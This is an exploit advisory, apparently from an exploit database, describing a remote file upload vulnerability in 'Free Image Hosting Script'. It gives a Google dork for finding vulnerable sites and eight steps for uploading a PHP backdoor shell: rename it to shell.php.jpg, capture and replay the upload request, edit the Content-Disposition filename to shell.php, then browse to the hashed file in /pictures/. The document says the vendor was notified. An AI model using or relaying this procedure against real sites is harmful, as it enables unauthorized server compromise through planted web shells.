============================================ Free Image Hosting Script Remote File Upload Vulnerability ============================================ # Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File Upload Vulnerability # Date: 26/12/11 # Author: ySecurity # Vendor or Software Link: http://www.photohostingscript.com # Price: $29.99 # Version: All versions effected # Category:: Remote File Upload # Google dork: inurl:"show-image.php?id=" # Tested on: Windows 7 # Vendor HAS been notified. ######################################################################################## NOTE: You will ONLY be able to find your shell if the "/pictures" directory and if the directory is not forbidden. This exploit allows hackers to upload a PHP backdoor into "/pictures/" directory via the use of Live HTTP Headers (Firefox Addon) [Vulnerability] Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on index page. Step 2: Rename your shell to shell.php.jpg and start capturing data with Live HTTP Headers Step 3: Enter tags for the image (can be anything) Step 4: Replay data with Live HTTP Headers - Step 5: Change [Content-Disposition: form-data; name="image1"; filename="shell.php.jpg"\r\n] to [Content-Disposition: form-data; name="image1"; filename="shell.php"\r\n] Step 6: Locate pictures directory: www.site.tld/imagehostingscript/pictures/ (usually) Step 7: Find PHP file (random digits.php) = should look like (321879194bc8ff2843bf7b63a666f665.php) Step 8: Navigate to backdoor = www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php ######################################################################################## Greets to: Team Intra Submitted ethically, after disclosure.